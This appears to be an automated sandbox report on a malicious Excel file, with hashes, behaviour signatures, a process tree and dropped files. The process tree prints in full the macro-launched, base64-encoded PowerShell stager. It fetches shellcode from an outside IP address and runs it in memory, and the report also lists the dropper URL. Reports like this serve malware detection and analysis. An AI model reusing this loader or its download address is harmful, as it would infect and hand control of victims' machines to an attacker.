Analysis

  • max time kernel
    33s
  • max time network
    36s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-11-2024 21:48

General

  • Target

    4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls

  • Size

    46KB

  • MD5

    a577d04005ded2c2a765cf59ab347508

  • SHA1

    9467b968e5ea5bf2d8b05f10ef11a2eab28cd29c

  • SHA256

    4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f

  • SHA512

    357aa26a6712dc5cc40c0854704098b3c373572c5efc01b73ebd047581c29133d26f6f0204373a83028384bd9e9411ad5420bcb99005b839ed7f9493292dadad

  • SSDEEP

    768:s4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:XSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4498e711c0238bfc2444a66003d745c6482f673b1ad4f6b643701e437d902e5f.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4268
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4812
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2268.tmp" "c:\Users\Admin\AppData\Local\Temp\5sljfrdp\CSC60297B08AA304B0F96162B44A9442652.TMP"
          4⤵
            PID:372

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.dll

      Filesize

      3KB

      MD5

      b867c862644547520312c4bf29fc946f

      SHA1

      869cdc4cc9bcc87c1112d6f487d11d8e7c693ee3

      SHA256

      6a5026cc589b8ca5db702fb8976a3daba5a94bf1ed1de8c8fd0cb7dc898fc707

      SHA512

      dccacf6de7b90e546507e9afd5ea17413d038bbd25348737a66bb8792d0c076f4ae71c1ae30c67449aac55407a9a12b29ddf34a618bc8481c7ad91fc427f079f

    • C:\Users\Admin\AppData\Local\Temp\RES2268.tmp

      Filesize

      1KB

      MD5

      ae0ec87d0780cd281b85f0dab6d10796

      SHA1

      3d387c55123665f172ed50443d3cab4b54928ba6

      SHA256

      ab806d1372e5bb560a0ebf693dc5315462aee75c80c097ca71e53c2e6370508d

      SHA512

      3dc063df5e42e386f4d702c39e791cc414301e80f02ce6a64e3d07b2ac90acd53415ab3d2b79c9ae521d8b0bb3e7513df26e630a81cd37480861c022468f3781

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgj0fima.qj1.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

      Filesize

      1KB

      MD5

      b78d36311a167ef513f6ed277b7929a0

      SHA1

      212dade9bf9fe79bdc92e77e56c3ea410cafc3b2

      SHA256

      3a56e0a4c14aaf0270f6871e6490a12696c233cd0bae0b7dfdd841e81ba1b811

      SHA512

      93f0d8b49d7a3570fedfe0917d6a4515584000f794270fd47fd23c83d6b0e4bebf083867ec0b2f8bd6fc1da6e403b31ee76b71213b7fdd173b20353c02c12445

    • \??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\5sljfrdp.cmdline

      Filesize

      369B

      MD5

      31010d98ce65c8ce58a910cb6d823e17

      SHA1

      2101cd82911e30ad13c4c9ffb05bb12c823ca2c0

      SHA256

      fd2188309eb3acdbbb86e2bdc9ac56fb845618b134fc98d7b8e5cc807b7a9548

      SHA512

      f4ed598bd84524f0b7660d2d496da81bf15809332214a5ae4617a297ee7af5007a6ee8937a7aaaf13b33f91001797638ba20def87f4eb9b0c6f4bbc9e77330be

    • \??\c:\Users\Admin\AppData\Local\Temp\5sljfrdp\CSC60297B08AA304B0F96162B44A9442652.TMP

      Filesize

      652B

      MD5

      1618c0fb414adfdc0e55f10fe3220dc8

      SHA1

      219e4cd8c6ead6029e5c6180d1b700f4f2bf2e36

      SHA256

      fc3c058707372dc8f51aa038d8fd9c62281ae6cf372416cef1b88825a4e4dd59

      SHA512

      e57871058d39da751bf8092191a865ec2f32f71f625f3d9a3c8f9594ec88730b7f975a88869636c4d63c2f7d5ad0b1fa9226adb1ea77246cfaffcacc433dbc3a

    • memory/2176-7-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

      Filesize

      64KB

    • memory/2176-30-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-0-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

      Filesize

      64KB

    • memory/2176-12-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-14-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-13-0x00007FFF0C9D0000-0x00007FFF0C9E0000-memory.dmp

      Filesize

      64KB

    • memory/2176-16-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-17-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-20-0x00007FFF0C9D0000-0x00007FFF0C9E0000-memory.dmp

      Filesize

      64KB

    • memory/2176-19-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-18-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-15-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-11-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-10-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-29-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-9-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-8-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-1-0x00007FFF4EF6D000-0x00007FFF4EF6E000-memory.dmp

      Filesize

      4KB

    • memory/2176-6-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-5-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-4-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

      Filesize

      64KB

    • memory/2176-2-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

      Filesize

      64KB

    • memory/2176-3-0x00007FFF0EF50000-0x00007FFF0EF60000-memory.dmp

      Filesize

      64KB

    • memory/2176-69-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-60-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-63-0x00007FFF4EF6D000-0x00007FFF4EF6E000-memory.dmp

      Filesize

      4KB

    • memory/2176-64-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/2176-65-0x00007FFF4EED0000-0x00007FFF4F0C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4268-58-0x0000022A51850000-0x0000022A51858000-memory.dmp

      Filesize

      32KB

    • memory/4268-45-0x0000022A51970000-0x0000022A51992000-memory.dmp

      Filesize

      136KB